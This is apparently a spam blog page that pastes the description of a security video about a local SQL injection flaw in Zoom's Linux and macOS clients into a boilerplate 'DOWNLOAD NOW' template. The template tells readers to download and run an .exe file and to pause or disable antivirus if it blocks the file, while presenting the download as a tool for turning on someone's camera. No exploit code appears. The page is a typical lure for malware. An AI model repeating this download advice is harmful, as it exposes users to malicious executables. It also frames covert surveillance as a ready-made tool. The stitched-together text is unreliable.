Sunday, March 28, 2021

Zoom – turning on someones camera using SQL injection

Latest Zoom – turning on someones camera using SQL injection is here, download and enjoy. Safe and Secure.
DOWNLOAD NOW!

Zoom – turning on someones camera using SQL injection

--- Notes --

This video is about local SQLinjection vulnerability in Linux and MacOS desktop applications of Zoom - conference app that gained even more popularity as remote meeting got more common in 2020. Exploiting the SQLi required to bypass doubling quotes protection that Zoom app used. Original writeup: Keegan's twitter: Follow me on twitter: Timestamps: 00:00 Intro 00:25 Initial discovery - zoommtg:// links 01:24 Analysing the binary 03:06 SQLi protection 03:55 ASCII & UTF-8 05:17 bypassing

Zoom - turning on someones camera using SQL injection
How to install:
- Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.) - Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!


Don't forget to read instructions after installation. Enjoy Zoom - turning on someones camera using SQL injection. All files are uploaded by users like you, we can't guarantee that Zoom - turning on someones camera using SQL injection are up to date. We are not responsible for any illegal actions you do with theses files. Download and use Zoom - turning on someones camera using SQL injection on your own responsibility. Zoom – turning on someones camera using SQL injection

No comments:

Post a Comment